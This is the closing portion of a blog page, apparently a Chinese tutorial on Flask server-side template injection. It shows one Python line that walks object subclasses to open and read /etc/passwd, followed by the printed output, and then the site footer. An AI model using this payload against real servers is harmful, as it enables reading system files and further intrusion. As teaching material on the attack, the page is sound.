<span class="token operator">>></span><span class="token operator">></span> <span class="token string">""</span><span class="token punctuation">.</span>__class__<span class="token punctuation">.</span>__mro__<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">.</span>__subclasses__<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">40</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"/etc/passwd"</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token keyword">read</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
nobody:<span class="token operator">*</span>:<span class="token operator">-</span><span class="token number">2</span>:<span class="token operator">-</span><span class="token number">2</span>:Unprivileged 
<span class="token keyword">User</span>:<span class="token operator">/</span>var<span class="token operator">/</span>empty:<span class="token operator">/</span>usr<span class="token operator">/</span>bin<span class="token operator">/</span><span class="token boolean">false</span>
root:<span class="token operator">*</span>:<span class="token number">0</span>:<span class="token number">0</span>:System 
Administrator:<span class="token operator">/</span>var<span class="token operator">/</span>root:<span class="token operator">/</span>bin<span class="token operator">/</span>sh
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>


    
  </article>

  
      
    <div class="nexmoe-post-copyright">
        <strong>Author：</strong>Wray Lee<br>
        <strong>Link：</strong><a href="http://blog.wray7.top/2023/09/04/Network/Safety/SSTI%20Flask%E6%A8%A1%E6%9D%BF/" title="http:&#x2F;&#x2F;blog.wray7.top&#x2F;2023&#x2F;09&#x2F;04&#x2F;Network&#x2F;Safety&#x2F;SSTI%20Flask%E6%A8%A1%E6%9D%BF&#x2F;" target="_blank" rel="noopener">http:&#x2F;&#x2F;blog.wray7.top&#x2F;2023&#x2F;09&#x2F;04&#x2F;Network&#x2F;Safety&#x2F;SSTI%20Flask%E6%A8%A1%E6%9D%BF&#x2F;</a><br>
        
            <strong>版权声明：</strong>本文采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/cn/deed.zh" target="_blank">CC BY-NC-SA 3.0 CN</a> 协议进行许可

        
    </div>


  
  
  <div class="nexmoe-post-meta nexmoe-rainbow">
   
    
</div>
  
  
    <script async src="/js/copy-codeblock.js?v=1712679368579"></script>
  

  
      <div class="nexmoe-post-footer">
          
      </div>
  
</div></div><div class="nexmoe-post-right">    <div class="nexmoe-fixed">
        <div class="nexmoe-tool">

            

            
            
            <button class="mdui-fab catalog" style="overflow:unset;">
                <i class="nexmoefont icon-i-catalog"></i>
                <div class="nexmoe-toc">
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SSTI-Flask%E6%A8%A1%E6%9D%BF"><span class="toc-number">1.</span> <span class="toc-text">SSTI Flask模板</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80"><span class="toc-number">2.</span> <span class="toc-text">基础</span></a></li></ol>
                </div>
            </button>
            

            

            <a href="#nexmoe-content" class="backtop toc-link" aria-label="Back To Top" title="top"><button class="mdui-fab mdui-ripple"><i class="nexmoefont icon-caret-top"></i></button></a>
        </div>
    </div>
</div></div><div id="nexmoe-footer"><!--!--></div><div id="nexmoe-search-space"><div class="search-container"><div class="search-header"><div class="search-input-container"><input class="search-input" type="text" placeholder="Search" onInput="sinput();"></div><a class="search-close" onclick="sclose();">×</a></div><div class="search-body"></div></div></div><div><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-2058306854838448" crossorigin="anonymous"></script>
</div></body></html>